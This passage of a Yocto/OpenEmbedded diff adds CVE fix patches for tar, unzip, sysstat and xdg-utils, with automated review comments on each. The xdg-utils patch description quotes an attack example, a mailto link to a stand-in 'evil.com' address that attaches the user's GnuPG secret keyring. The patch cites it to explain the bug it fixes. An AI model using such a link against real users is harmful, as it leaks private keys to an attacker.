+- (unsigned long long) val2 *
+- (unsigned long long) val3 > UINT_MAX) {
++ if ((val1 != 0) && (val2 != 0) && (val3 != 0) &&
++ (((unsigned long long) UINT_MAX / (unsigned long long) val1 <
++ (unsigned long long) val2) ||
++ ((unsigned long long) UINT_MAX / ((unsigned long long) val1 * (unsigned long long) val2) <
++ (unsigned long long) val3))) {
+ #ifdef DEBUG
+- fprintf(stderr, "%s: Overflow detected (%llu). Aborting...\n",
+- __FUNCTION__,
+- (unsigned long long) val1 * (unsigned long long) val2 * (unsigned long long) val3);
++ fprintf(stderr, "%s: Overflow detected (%u,%u,%u). Aborting...\n",
++ __FUNCTION__, val1, val2, val3);
+ #endif
+- exit(4);
++ exit(4);
+ }
+ }
+
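Review bot: The rewritten debug message prints the three `size_t` arguments with `%u`, which does not match the argument type where size_t is wider than unsigned int; `%zu` is the matching conversion: `fprintf(stderr, "%s: Overflow detected (%zu,%zu,%zu). Aborting...\n", __FUNCTION__, val1, val2, val3);`. The line is compiled only under DEBUG, so release builds are not affected. In the header, the `Origin:` line points at an opencontainers/runc URL while the Upstream-Status line gives the same commit id under sysstat/sysstat; the Origin line looks wrong and should be corrected or dropped.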
diff --git a/meta/recipes-extended/sysstat/sysstat_12.2.1.bb b/meta/recipes-extended/sysstat/sysstat_12.2.1.bb
index 2a90f89d25..ac7b898db9 100644
--- a/meta/recipes-extended/sysstat/sysstat_12.2.1.bb
+++ b/meta/recipes-extended/sysstat/sysstat_12.2.1.bb
@@ -2,7 +2,10 @@ require sysstat.inc
LIC_FILES_CHKSUM = "file://COPYING;md5=a23a74b3f4caf9616230789d94217acb"
-SRC_URI += "file://0001-configure.in-remove-check-for-chkconfig.patch"
+SRC_URI += "file://0001-configure.in-remove-check-for-chkconfig.patch \
+ file://CVE-2022-39377.patch \
+ file://CVE-2023-33204.patch \
+ "
SRC_URI[md5sum] = "9dfff5fac24e35bd92fb7896debf2ffb"
SRC_URI[sha256sum] = "8edb0e19b514ac560a098a02933a4735b881296d61014db89bf80f05dd7a4732"
diff --git a/meta/recipes-extended/tar/tar/CVE-2021-20193.patch b/meta/recipes-extended/tar/tar/CVE-2021-20193.patch
new file mode 100644
index 0000000000..89e8e20844
--- /dev/null
+++ b/meta/recipes-extended/tar/tar/CVE-2021-20193.patch
@@ -0,0 +1,133 @@
+From d9d4435692150fa8ff68e1b1a473d187cc3fd777 Mon Sep 17 00:00:00 2001
+From: Sergey Poznyakoff <gray@gnu.org>
+Date: Sun, 17 Jan 2021 20:41:11 +0200
+Subject: Fix memory leak in read_header
+
+Bug reported in https://savannah.gnu.org/bugs/?59897
+
+* src/list.c (read_header): Don't return directly from the loop.
+Instead set the status and break. Return the status. Free
+next_long_name and next_long_link before returning.
+
+CVE: CVE-2021-20193
+Upstream-Status: Backport
+[https://git.savannah.gnu.org/cgit/tar.git/patch/?id=d9d4435692150fa8ff68e1b1a473d187cc3fd777]
+Signed-off-by: Anatol Belski <anbelski@linux.microsoft.com>
+
+---
+ src/list.c | 40 ++++++++++++++++++++++++++++------------
+ 1 file changed, 28 insertions(+), 12 deletions(-)
+
+diff --git a/src/list.c b/src/list.c
+index e40a5c8..d7ef441 100644
+--- a/src/list.c
++++ b/src/list.c
+@@ -408,26 +408,27 @@ read_header (union block **return_block, struct tar_stat_info *info,
+ enum read_header_mode mode)
+ {
+ union block *header;
+- union block *header_copy;
+ char *bp;
+ union block *data_block;
+ size_t size, written;
+- union block *next_long_name = 0;
+- union block *next_long_link = 0;
++ union block *next_long_name = NULL;
++ union block *next_long_link = NULL;
+ size_t next_long_name_blocks = 0;
+ size_t next_long_link_blocks = 0;
+-
++ enum read_header status = HEADER_SUCCESS;
++
+ while (1)
+ {
+- enum read_header status;
+-
+ header = find_next_block ();
+ *return_block = header;
+ if (!header)
+- return HEADER_END_OF_FILE;
++ {
++ status = HEADER_END_OF_FILE;
++ break;
++ }
+
+ if ((status = tar_checksum (header, false)) != HEADER_SUCCESS)
+- return status;
++ break;
+
+ /* Good block. Decode file size and return. */
+
+@@ -437,7 +438,10 @@ read_header (union block **return_block, struct tar_stat_info *info,
+ {
+ info->stat.st_size = OFF_FROM_HEADER (header->header.size);
+ if (info->stat.st_size < 0)
+- return HEADER_FAILURE;
++ {
++ status = HEADER_FAILURE;
++ break;
++ }
+ }
+
+ if (header->header.typeflag == GNUTYPE_LONGNAME
+@@ -447,10 +451,14 @@ read_header (union block **return_block, struct tar_stat_info *info,
+ || header->header.typeflag == SOLARIS_XHDTYPE)
+ {
+ if (mode == read_header_x_raw)
+- return HEADER_SUCCESS_EXTENDED;
++ {
++ status = HEADER_SUCCESS_EXTENDED;
++ break;
++ }
+ else if (header->header.typeflag == GNUTYPE_LONGNAME
+ || header->header.typeflag == GNUTYPE_LONGLINK)
+ {
++ union block *header_copy;
+ size_t name_size = info->stat.st_size;
+ size_t n = name_size % BLOCKSIZE;
+ size = name_size + BLOCKSIZE;
+@@ -517,7 +525,10 @@ read_header (union block **return_block, struct tar_stat_info *info,
+ xheader_decode_global (&xhdr);
+ xheader_destroy (&xhdr);
+ if (mode == read_header_x_global)
+- return HEADER_SUCCESS_EXTENDED;
++ {
++ status = HEADER_SUCCESS_EXTENDED;
++ break;
++ }
+ }
+
+ /* Loop! */
+@@ -536,6 +547,7 @@ read_header (union block **return_block, struct tar_stat_info *info,
+ name = next_long_name->buffer + BLOCKSIZE;
+ recent_long_name = next_long_name;
+ recent_long_name_blocks = next_long_name_blocks;
++ next_long_name = NULL;
+ }
+ else
+ {
+@@ -567,6 +579,7 @@ read_header (union block **return_block, struct tar_stat_info *info,
+ name = next_long_link->buffer + BLOCKSIZE;
+ recent_long_link = next_long_link;
+ recent_long_link_blocks = next_long_link_blocks;
++ next_long_link = NULL;
+ }
+ else
+ {
+@@ -578,9 +591,12 @@ read_header (union block **return_block, struct tar_stat_info *info,
+ }
+ assign_string (&info->link_name, name);
+
+- return HEADER_SUCCESS;
++ break;
+ }
+ }
++ free (next_long_name);
++ free (next_long_link);
++ return status;
+ }
+
+ #define ISOCTAL(c) ((c)>='0'&&(c)<='7')
+--
+cgit v1.2.1
+
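Review bot: The new `free (next_long_name)` and `free (next_long_link)` at the end of read_header are safe only because the added `next_long_name = NULL;` and `next_long_link = NULL;` lines clear each pointer once its block has been handed to recent_long_name / recent_long_link, and nothing in the code says so. A comment at each assignment, e.g. `/* ownership moved to recent_long_name; the final free() must not release it */`, would protect that invariant against later edits. Parts of read_header between the inner hunks are not shown, so other paths that set these pointers were not checked.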
diff --git a/meta/recipes-extended/tar/tar/CVE-2022-48303.patch b/meta/recipes-extended/tar/tar/CVE-2022-48303.patch
new file mode 100644
index 0000000000..b2f40f3e64
--- /dev/null
+++ b/meta/recipes-extended/tar/tar/CVE-2022-48303.patch
@@ -0,0 +1,43 @@
+From 3da78400eafcccb97e2f2fd4b227ea40d794ede8 Mon Sep 17 00:00:00 2001
+From: Sergey Poznyakoff <gray@gnu.org>
+Date: Sat, 11 Feb 2023 11:57:39 +0200
+Subject: Fix boundary checking in base-256 decoder
+
+* src/list.c (from_header): Base-256 encoding is at least 2 bytes
+long.
+
+Upstream-Status: Backport [see reference below]
+CVE: CVE-2022-48303
+
+Reference to upstream patch:
+https://savannah.gnu.org/bugs/?62387
+https://git.savannah.gnu.org/cgit/tar.git/patch/src/list.c?id=3da78400eafcccb97e2f2fd4b227ea40d794ede8
+
+Signed-off-by: Rodolfo Quesada Zumbado <rodolfo.zumbado@windriver.com>
+Signed-off-by: Joe Slater <joe.slater@windriver.com>
+---
+ src/list.c | 5 +++--
+ 1 file changed, 3 insertions(+), 2 deletions(-)Signed-off-by: Rodolfo Quesada Zumbado <rodolfo.zumbado@windriver.com>
+
+
+(limited to 'src/list.c')
+
+diff --git a/src/list.c b/src/list.c
+index 9fafc42..86bcfdd 100644
+--- a/src/list.c
++++ b/src/list.c
+@@ -881,8 +881,9 @@ from_header (char const *where0, size_t digs, char const *type,
+ where++;
+ }
+ }
+- else if (*where == '\200' /* positive base-256 */
+- || *where == '\377' /* negative base-256 */)
++ else if (where <= lim - 2
++ && (*where == '\200' /* positive base-256 */
++ || *where == '\377' /* negative base-256 */))
+ {
+ /* Parse base-256 output. A nonnegative number N is
+ represented as (256**DIGS)/2 + N; a negative number -N is
+--
+cgit v1.1
+
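Review bot: The header of this patch file carries extraction residue: the diffstat summary line is fused with a second copy of the `Signed-off-by: Rodolfo Quesada Zumbado` trailer, and a stray `(limited to 'src/list.c')` line from the cgit page follows it. Both should be removed so that each trailer appears once and the preamble reads as a normal patch header. In the code, the added `where <= lim - 2` test depends on `lim`, which is defined outside the hunk; a short comment such as `/* base-256 needs the marker byte plus at least one more byte */` would record why the bound is 2.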
diff --git a/meta/recipes-extended/tar/tar/CVE-2023-39804.patch b/meta/recipes-extended/tar/tar/CVE-2023-39804.patch
new file mode 100644
index 0000000000..f550928540
--- /dev/null
+++ b/meta/recipes-extended/tar/tar/CVE-2023-39804.patch
@@ -0,0 +1,64 @@
+From a339f05cd269013fa133d2f148d73f6f7d4247e4 Mon Sep 17 00:00:00 2001
+From: Sergey Poznyakoff <gray@gnu.org>
+Date: Sat, 28 Aug 2021 16:02:12 +0300
+Subject: Fix handling of extended header prefixes
+
+* src/xheader.c (locate_handler): Recognize prefix keywords only
+when followed by a dot.
+(xattr_decoder): Use xmalloc/xstrdup instead of alloc
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/tar.git/commit/?id=a339f05cd269013fa133d2f148d73f6f7d4247e4]
+CVE: CVE-2023-39804
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ src/xheader.c | 17 +++++++++--------
+ 1 file changed, 9 insertions(+), 8 deletions(-)
+
+diff --git a/src/xheader.c b/src/xheader.c
+index 4f8b2b2..3cd694d 100644
+--- a/src/xheader.c
++++ b/src/xheader.c
+@@ -637,11 +637,11 @@ static struct xhdr_tab const *
+ locate_handler (char const *keyword)
+ {
+ struct xhdr_tab const *p;
+-
+ for (p = xhdr_tab; p->keyword; p++)
+ if (p->prefix)
+ {
+- if (strncmp (p->keyword, keyword, strlen(p->keyword)) == 0)
++ size_t kwlen = strlen (p->keyword);
++ if (keyword[kwlen] == '.' && strncmp (p->keyword, keyword, kwlen) == 0)
+ return p;
+ }
+ else
+@@ -1716,19 +1716,20 @@ xattr_decoder (struct tar_stat_info *st,
+ char const *keyword, char const *arg, size_t size)
+ {
+ char *xstr, *xkey;
+-
++
+ /* copy keyword */
+- size_t klen_raw = strlen (keyword);
+- xkey = alloca (klen_raw + 1);
+- memcpy (xkey, keyword, klen_raw + 1) /* including null-terminating */;
++ xkey = xstrdup (keyword);
+
+ /* copy value */
+- xstr = alloca (size + 1);
++ xstr = xmalloc (size + 1);
+ memcpy (xstr, arg, size + 1); /* separator included, for GNU tar '\n' */;
+
+ xattr_decode_keyword (xkey);
+
+- xheader_xattr_add (st, xkey + strlen("SCHILY.xattr."), xstr, size);
++ xheader_xattr_add (st, xkey + strlen ("SCHILY.xattr."), xstr, size);
++
++ free (xkey);
++ free (xstr);
+ }
+
+ static void
+--
+cgit v1.1
+
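Review bot: In locate_handler the new condition reads `keyword[kwlen]` before strncmp has shown that keyword is at least kwlen characters long, so for a keyword shorter than the table prefix the index lies past the string's terminator. Testing in the other order avoids that: `if (strncmp (p->keyword, keyword, kwlen) == 0 && keyword[kwlen] == '.')`. Whether keyword always sits inside a larger buffer that makes the read harmless is not visible here. In xattr_decoder the added `free (xstr)` assumes xheader_xattr_add copies the value, and that function is outside the hunk; locate_handler also continues past the hunk.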
diff --git a/meta/recipes-extended/tar/tar_1.32.bb b/meta/recipes-extended/tar/tar_1.32.bb
index ebe6cb0dbd..9297480e85 100644
--- a/meta/recipes-extended/tar/tar_1.32.bb
+++ b/meta/recipes-extended/tar/tar_1.32.bb
@@ -6,8 +6,13 @@ SECTION = "base"
LICENSE = "GPLv3"
LIC_FILES_CHKSUM = "file://COPYING;md5=d32239bcb673463ab874e80d47fae504"
+PR = "r1"
+
SRC_URI = "${GNU_MIRROR}/tar/tar-${PV}.tar.bz2 \
file://musl_dirent.patch \
+ file://CVE-2021-20193.patch \
+ file://CVE-2022-48303.patch \
+ file://CVE-2023-39804.patch \
"
SRC_URI[md5sum] = "17917356fff5cb4bd3cd5a6c3e727b05"
@@ -64,3 +69,7 @@ PROVIDES_append_class-native = " tar-replacement-native"
NATIVE_PACKAGE_PATH_SUFFIX = "/${PN}"
BBCLASSEXTEND = "native nativesdk"
+
+# Avoid false positives from CVEs in node-tar package
+# For example CVE-2021-{32803,32804,37701,37712,37713}
+CVE_PRODUCT = "gnu:tar"
diff --git a/meta/recipes-extended/texinfo-dummy-native/texinfo-dummy-native.bb b/meta/recipes-extended/texinfo-dummy-native/texinfo-dummy-native.bb
index ec04bfe390..a942ac2991 100644
--- a/meta/recipes-extended/texinfo-dummy-native/texinfo-dummy-native.bb
+++ b/meta/recipes-extended/texinfo-dummy-native/texinfo-dummy-native.bb
@@ -1,5 +1,6 @@
SUMMARY = "Fake version of the texinfo utility suite"
SECTION = "console/utils"
+DESCRIPTION = "${SUMMARY}"
LICENSE = "MIT"
LIC_FILES_CHKSUM = "file://COPYING;md5=d6bb62e73ca8b901d3f2e9d71542f4bb"
DEPENDS = ""
diff --git a/meta/recipes-extended/timezone/timezone.inc b/meta/recipes-extended/timezone/timezone.inc
index 5368464f30..46bc1b794e 100644
--- a/meta/recipes-extended/timezone/timezone.inc
+++ b/meta/recipes-extended/timezone/timezone.inc
@@ -3,10 +3,10 @@ DESCRIPTION = "The Time Zone Database contains code and data that represent \
the history of local time for many representative locations around the globe."
HOMEPAGE = "http://www.iana.org/time-zones"
SECTION = "base"
-LICENSE = "PD & BSD & BSD-3-Clause"
+LICENSE = "PD & BSD-3-Clause"
LIC_FILES_CHKSUM = "file://LICENSE;md5=c679c9d6b02bc2757b3eaf8f53c43fba"
-PV = "2020d"
+PV = "2024a"
SRC_URI =" http://www.iana.org/time-zones/repository/releases/tzcode${PV}.tar.gz;name=tzcode \
http://www.iana.org/time-zones/repository/releases/tzdata${PV}.tar.gz;name=tzdata \
@@ -14,5 +14,5 @@ SRC_URI =" http://www.iana.org/time-zones/repository/releases/tzcode${PV}.tar.gz
UPSTREAM_CHECK_URI = "http://www.iana.org/time-zones"
-SRC_URI[tzcode.sha256sum] = "6cf050ba28e8053029d3f32d71341d11a794c6b5dd51a77fc769d6dae364fad5"
-SRC_URI[tzdata.sha256sum] = "8d813957de363387696f05af8a8889afa282ab5016a764c701a20758d39cbaf3"
+SRC_URI[tzcode.sha256sum] = "80072894adff5a458f1d143e16e4ca1d8b2a122c9c5399da482cb68cba6a1ff8"
+SRC_URI[tzdata.sha256sum] = "0d0434459acbd2059a7a8da1f3304a84a86591f6ed69c6248fffa502b6edffe3"
diff --git a/meta/recipes-extended/timezone/tzdata.bb b/meta/recipes-extended/timezone/tzdata.bb
index e6a0655afe..cc6206ac70 100644
--- a/meta/recipes-extended/timezone/tzdata.bb
+++ b/meta/recipes-extended/timezone/tzdata.bb
@@ -19,13 +19,17 @@ TZONES= "africa antarctica asia australasia europe northamerica southamerica \
"
# pacificnew
+# "slim" is the default since 2020b
+# "fat" is needed by e.g. MariaDB's mysql_tzinfo_to_sql
+ZIC_FMT ?= "slim"
+
do_compile () {
for zone in ${TZONES}; do \
- ${STAGING_BINDIR_NATIVE}/zic -d ${WORKDIR}${datadir}/zoneinfo -L /dev/null \
+ ${STAGING_BINDIR_NATIVE}/zic -b ${ZIC_FMT} -d ${WORKDIR}${datadir}/zoneinfo -L /dev/null \
${S}/${zone} ; \
- ${STAGING_BINDIR_NATIVE}/zic -d ${WORKDIR}${datadir}/zoneinfo/posix -L /dev/null \
+ ${STAGING_BINDIR_NATIVE}/zic -b ${ZIC_FMT} -d ${WORKDIR}${datadir}/zoneinfo/posix -L /dev/null \
${S}/${zone} ; \
- ${STAGING_BINDIR_NATIVE}/zic -d ${WORKDIR}${datadir}/zoneinfo/right -L ${S}/leapseconds \
+ ${STAGING_BINDIR_NATIVE}/zic -b ${ZIC_FMT} -d ${WORKDIR}${datadir}/zoneinfo/right -L ${S}/leapseconds \
${S}/${zone} ; \
done
}
diff --git a/meta/recipes-extended/unzip/unzip/CVE-2021-4217.patch b/meta/recipes-extended/unzip/unzip/CVE-2021-4217.patch
new file mode 100644
index 0000000000..6ba2b879a3
--- /dev/null
+++ b/meta/recipes-extended/unzip/unzip/CVE-2021-4217.patch
@@ -0,0 +1,67 @@
+From 731d698377dbd1f5b1b90efeb8094602ed59fc40 Mon Sep 17 00:00:00 2001
+From: Nils Bars <nils.bars@t-online.de>
+Date: Mon, 17 Jan 2022 16:53:16 +0000
+Subject: [PATCH] Fix null pointer dereference and use of uninitialized data
+
+This fixes a bug that causes use of uninitialized heap data if `readbuf` fails
+to read as many bytes as indicated by the extra field length attribute.
+Furthermore, this fixes a null pointer dereference if an archive contains an
+`EF_UNIPATH` extra field but does not have a filename set.
+---
+ fileio.c | 5 ++++-
+ process.c | 6 +++++-
+ 2 files changed, 9 insertions(+), 2 deletions(-)
+---
+
+Patch from:
+https://bugs.launchpad.net/ubuntu/+source/unzip/+bug/1957077
+https://launchpadlibrarian.net/580782282/0001-Fix-null-pointer-dereference-and-use-of-uninitialized-data.patch
+Regenerated to apply without offsets.
+
+CVE: CVE-2021-4217
+
+Upstream-Status: Pending [infozip upstream inactive]
+
+Signed-off-by: Joe Slater <joe.slater@windriver.com>
+
+
+diff --git a/fileio.c b/fileio.c
+index 14460f3..1dc319e 100644
+--- a/fileio.c
++++ b/fileio.c
+@@ -2301,8 +2301,11 @@ int do_string(__G__ length, option) /* return PK-type error code */
+ seek_zipf(__G__ G.cur_zipfile_bufstart - G.extra_bytes +
+ (G.inptr-G.inbuf) + length);
+ } else {
+- if (readbuf(__G__ (char *)G.extra_field, length) == 0)
++ unsigned bytes_read = readbuf(__G__ (char *)G.extra_field, length);
++ if (bytes_read == 0)
+ return PK_EOF;
++ if (bytes_read != length)
++ return PK_ERR;
+ /* Looks like here is where extra fields are read */
+ if (getZip64Data(__G__ G.extra_field, length) != PK_COOL)
+ {
+diff --git a/process.c b/process.c
+index 5f8f6c6..de843a5 100644
+--- a/process.c
++++ b/process.c
+@@ -2058,10 +2058,14 @@ int getUnicodeData(__G__ ef_buf, ef_len)
+ G.unipath_checksum = makelong(offset + ef_buf);
+ offset += 4;
+
++ if (!G.filename_full) {
++ /* Check if we have a unicode extra section but no filename set */
++ return PK_ERR;
++ }
++
+ /*
+ * Compute 32-bit crc
+ */
+-
+ chksum = crc32(chksum, (uch *)(G.filename_full),
+ strlen(G.filename_full));
+
+--
+2.32.0
+
diff --git a/meta/recipes-extended/unzip/unzip/CVE-2022-0529.patch b/meta/recipes-extended/unzip/unzip/CVE-2022-0529.patch
new file mode 100644
index 0000000000..1c1e120deb
--- /dev/null
+++ b/meta/recipes-extended/unzip/unzip/CVE-2022-0529.patch
@@ -0,0 +1,39 @@
+https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1010355
+
+CVE: CVE-2022-0529
+Upstream-Status: Inactive-Upstream [need a new release]
+
+diff --git a/process.c b/process.c
+index d2a846e..99b9c7b 100644
+--- a/process.c
++++ b/process.c
+@@ -2507,13 +2507,15 @@ char *wide_to_local_string(wide_string, escape_all)
+ char buf[9];
+ char *buffer = NULL;
+ char *local_string = NULL;
++ size_t buffer_size;
+
+ for (wsize = 0; wide_string[wsize]; wsize++) ;
+
+ if (max_bytes < MAX_ESCAPE_BYTES)
+ max_bytes = MAX_ESCAPE_BYTES;
+
+- if ((buffer = (char *)malloc(wsize * max_bytes + 1)) == NULL) {
++ buffer_size = wsize * max_bytes + 1;
++ if ((buffer = (char *)malloc(buffer_size)) == NULL) {
+ return NULL;
+ }
+
+@@ -2552,7 +2554,11 @@ char *wide_to_local_string(wide_string, escape_all)
+ /* no MB for this wide */
+ /* use escape for wide character */
+ char *escape_string = wide_to_escape_string(wide_string[i]);
+- strcat(buffer, escape_string);
++ size_t buffer_len = strlen(buffer);
++ size_t escape_string_len = strlen(escape_string);
++ if (buffer_len + escape_string_len + 1 > buffer_size)
++ escape_string_len = buffer_size - buffer_len - 1;
++ strncat(buffer, escape_string, escape_string_len);
+ free(escape_string);
+ }
+ }
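Review bot: This patch file has no author, description or Signed-off-by line, only a Debian bug URL and the CVE and Upstream-Status tags, so its origin and intent cannot be checked from the file itself; CVE-2022-0530.patch has the same gap. Each should carry a short description of the defect and the importer's `Signed-off-by:` trailer. In the code, the bound added before `strncat` shortens the escape string silently when it does not fit, which may leave a partial escape sequence in the result; a comment such as `/* clip to the space left rather than overflow buffer */` would make that choice explicit. Any other append into `buffer` in this loop is outside the hunk and was not checked.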
diff --git a/meta/recipes-extended/unzip/unzip/CVE-2022-0530.patch b/meta/recipes-extended/unzip/unzip/CVE-2022-0530.patch
new file mode 100644
index 0000000000..363dafddc9
--- /dev/null
+++ b/meta/recipes-extended/unzip/unzip/CVE-2022-0530.patch
@@ -0,0 +1,33 @@
+https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1010355
+
+CVE: CVE-2022-0530
+Upstream-Status: Inactive-Upstream [need a new release]
+
+diff --git a/fileio.c b/fileio.c
+index 6290824..77e4b5f 100644
+--- a/fileio.c
++++ b/fileio.c
+@@ -2361,6 +2361,9 @@ int do_string(__G__ length, option) /* return PK-type error code */
+ /* convert UTF-8 to local character set */
+ fn = utf8_to_local_string(G.unipath_filename,
+ G.unicode_escape_all);
++ if (fn == NULL)
++ return PK_ERR;
++
+ /* make sure filename is short enough */
+ if (strlen(fn) >= FILNAMSIZ) {
+ fn[FILNAMSIZ - 1] = '\0';
+diff --git a/process.c b/process.c
+index d2a846e..715bc0f 100644
+--- a/process.c
++++ b/process.c
+@@ -2605,6 +2605,8 @@ char *utf8_to_local_string(utf8_string, escape_all)
+ int escape_all;
+ {
+ zwchar *wide = utf8_to_wide_string(utf8_string);
++ if (wide == NULL)
++ return NULL;
+ char *loc = wide_to_local_string(wide, escape_all);
+ free(wide);
+ return loc;
+
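Review bot: In `utf8_to_local_string` the added `if (wide == NULL) return NULL;` sits between two declarations, which leaves `char *loc = ...` after a statement; the visible code is K&R style with declarations at the top of the block, and a strict C89 compiler would reject the mix. Declaring `char *loc;` first and assigning `loc = wide_to_local_string(wide, escape_all);` after the check keeps the fix and the file's style. In `do_string` the new `return PK_ERR` leaves the function early; its body continues outside the hunk, so confirm nothing allocated before that point needs releasing. The patch header also has no Signed-off-by line from whoever added it to the layer.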
diff --git a/meta/recipes-extended/unzip/unzip_6.0.bb b/meta/recipes-extended/unzip/unzip_6.0.bb
index c1ea0a9a2c..fa57c8f5bd 100644
--- a/meta/recipes-extended/unzip/unzip_6.0.bb
+++ b/meta/recipes-extended/unzip/unzip_6.0.bb
@@ -1,5 +1,6 @@
SUMMARY = "Utilities for extracting and viewing files in .zip archives"
HOMEPAGE = "http://www.info-zip.org"
+DESCRIPTION = "Info-ZIP's purpose is to provide free, portable, high-quality versions of the Zip and UnZip compressor-archiver utilities that are compatible with the DOS-based PKZIP by PKWARE, Inc."
SECTION = "console/utils"
LICENSE = "BSD-3-Clause"
LIC_FILES_CHKSUM = "file://LICENSE;md5=94caec5a51ef55ef711ee4e8b1c69e29"
@@ -25,12 +26,18 @@ SRC_URI = "${SOURCEFORGE_MIRROR}/infozip/UnZip%206.x%20%28latest%29/UnZip%206.0/
file://CVE-2019-13232_p1.patch \
file://CVE-2019-13232_p2.patch \
file://CVE-2019-13232_p3.patch \
+ file://CVE-2021-4217.patch \
+ file://CVE-2022-0529.patch \
+ file://CVE-2022-0530.patch \
"
UPSTREAM_VERSION_UNKNOWN = "1"
SRC_URI[md5sum] = "62b490407489521db863b523a7f86375"
SRC_URI[sha256sum] = "036d96991646d0449ed0aa952e4fbe21b476ce994abc276e49d30e686708bd37"
+# Patch from https://bugzilla.redhat.com/attachment.cgi?id=293893&action=diff applied to 6.0 source
+CVE_CHECK_WHITELIST += "CVE-2008-0888"
+
# exclude version 5.5.2 which triggers a false positive
UPSTREAM_CHECK_REGEX = "unzip(?P<pver>(?!552).+)\.tgz"
diff --git a/meta/recipes-extended/watchdog/watchdog_5.15.bb b/meta/recipes-extended/watchdog/watchdog_5.15.bb
index 1acab2e9e7..0adf1fbb41 100644
--- a/meta/recipes-extended/watchdog/watchdog_5.15.bb
+++ b/meta/recipes-extended/watchdog/watchdog_5.15.bb
@@ -18,6 +18,10 @@ SRC_URI = "${SOURCEFORGE_MIRROR}/watchdog/watchdog-${PV}.tar.gz \
SRC_URI[md5sum] = "678c32f6f35a0492c9c1b76b4aa88828"
SRC_URI[sha256sum] = "ffdc865137ad5d8e53664bd22bad4de6ca136d1b4636720320cb52af0c18947c"
+# Can be dropped when the output next changes, avoids failures after
+# reproducibility issues
+PR = "r1"
+
UPSTREAM_CHECK_URI = "http://sourceforge.net/projects/watchdog/files/watchdog/"
UPSTREAM_CHECK_REGEX = "/watchdog/(?P<pver>(\d+[\.\-_]*)+)/"
@@ -28,6 +32,7 @@ CFLAGS += "-I${STAGING_INCDIR}/tirpc"
LDFLAGS += "-ltirpc"
EXTRA_OECONF += " --disable-nfs "
+CACHED_CONFIGUREVARS += "ac_cv_path_PATH_SENDMAIL=${sbindir}/sendmail"
INITSCRIPT_PACKAGES = "${PN} ${PN}-keepalive"
diff --git a/meta/recipes-extended/xdg-utils/xdg-utils/1f199813e0eb0246f63b54e9e154970e609575af.patch b/meta/recipes-extended/xdg-utils/xdg-utils/1f199813e0eb0246f63b54e9e154970e609575af.patch
new file mode 100644
index 0000000000..948b9e22e9
--- /dev/null
+++ b/meta/recipes-extended/xdg-utils/xdg-utils/1f199813e0eb0246f63b54e9e154970e609575af.patch
@@ -0,0 +1,58 @@
+From 1f199813e0eb0246f63b54e9e154970e609575af Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?J=C3=B6rg=20Thalheim?= <joerg@thalheim.io>
+Date: Tue, 18 Aug 2020 16:52:24 +0100
+Subject: [PATCH] xdg-email: remove attachment handling from mailto
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+This allows attacker to extract secrets from users:
+
+mailto:sid@evil.com?attach=/.gnupg/secring.gpg
+
+See also https://bugzilla.mozilla.org/show_bug.cgi?id=1613425
+and https://gitlab.freedesktop.org/xdg/xdg-utils/-/issues/177
+
+Signed-off-by: Jörg Thalheim <joerg@thalheim.io>
+---
+ scripts/xdg-email.in | 7 +------
+ 1 file changed, 1 insertion(+), 6 deletions(-)
+
+Upstream-Status: Backport
+CVE: CVE-2020-27748
+
+diff --git a/scripts/xdg-email.in b/scripts/xdg-email.in
+index 6db58ad..5d2f4f3 100644
+--- a/scripts/xdg-email.in
++++ b/scripts/xdg-email.in
+@@ -32,7 +32,7 @@ _USAGE
+
+ run_thunderbird()
+ {
+- local THUNDERBIRD MAILTO NEWMAILTO TO CC BCC SUBJECT BODY ATTACH
++ local THUNDERBIRD MAILTO NEWMAILTO TO CC BCC SUBJECT BODY
+ THUNDERBIRD="$1"
+ MAILTO=$(echo "$2" | sed 's/^mailto://')
+ echo "$MAILTO" | grep -qs "^?"
+@@ -48,7 +48,6 @@ run_thunderbird()
+ BCC=$(/bin/echo -e $(echo "$MAILTO" | grep '^bcc=' | sed 's/^bcc=//;s/%\(..\)/\\x\1/g' | awk '{ printf "%s,",$0 }'))
+ SUBJECT=$(echo "$MAILTO" | grep '^subject=' | tail -n 1)
+ BODY=$(echo "$MAILTO" | grep '^body=' | tail -n 1)
+- ATTACH=$(/bin/echo -e $(echo "$MAILTO" | grep '^attach=' | sed 's/^attach=//;s/%\(..\)/\\x\1/g' | awk '{ printf "%s,",$0 }' | sed 's/,$//'))
+
+ if [ -z "$TO" ] ; then
+ NEWMAILTO=
+@@ -68,10 +67,6 @@ run_thunderbird()
+ NEWMAILTO="${NEWMAILTO},$BODY"
+ fi
+
+- if [ -n "$ATTACH" ] ; then
+- NEWMAILTO="${NEWMAILTO},attachment='${ATTACH}'"
+- fi
+-
+ NEWMAILTO=$(echo "$NEWMAILTO" | sed 's/^,//')
+ DEBUG 1 "Running $THUNDERBIRD -compose \"$NEWMAILTO\""
+ "$THUNDERBIRD" -compose "$NEWMAILTO"
+--
+GitLab
+
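Review bot: The patch header gives `Upstream-Status: Backport` with no upstream reference, and the file is named after the commit hash although it is tagged `CVE: CVE-2020-27748`, unlike the `CVE-*.patch` files added alongside it. A line such as `Upstream-Status: Backport [https://gitlab.freedesktop.org/xdg/xdg-utils/-/commit/1f199813e0eb0246f63b54e9e154970e609575af]` (URL to be confirmed against upstream) and a Signed-off-by from the person who imported it would make the provenance checkable. The change itself only drops `attach=` inside `run_thunderbird`; the `to=`/`cc=`/`bcc=` values in the context lines are still percent-decoded and spliced into the `-compose` string, which the CVE-2022-4055.patch added in this same commit handles by removing the function.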
diff --git a/meta/recipes-extended/xdg-utils/xdg-utils/CVE-2022-4055.patch b/meta/recipes-extended/xdg-utils/xdg-utils/CVE-2022-4055.patch
new file mode 100644
index 0000000000..383634ad53
--- /dev/null
+++ b/meta/recipes-extended/xdg-utils/xdg-utils/CVE-2022-4055.patch
@@ -0,0 +1,165 @@
+From f67c4d1f8bd2e3cbcb9eb49f5e897075e7426780 Mon Sep 17 00:00:00 2001
+From: Gabriel Corona <gabriel.corona@enst-bretagne.fr>
+Date: Thu, 25 Aug 2022 23:51:45 +0200
+Subject: [PATCH] Disable special support for Thunderbird in xdg-email (fixes
+ CVE-2020-27748, CVE-2022-4055)
+
+Upstream-Status: Backport [https://gitlab.freedesktop.org/xdg/xdg-utils/-/commit/f67c4d1f8bd2e3cbcb9eb49f5e897075e7426780]
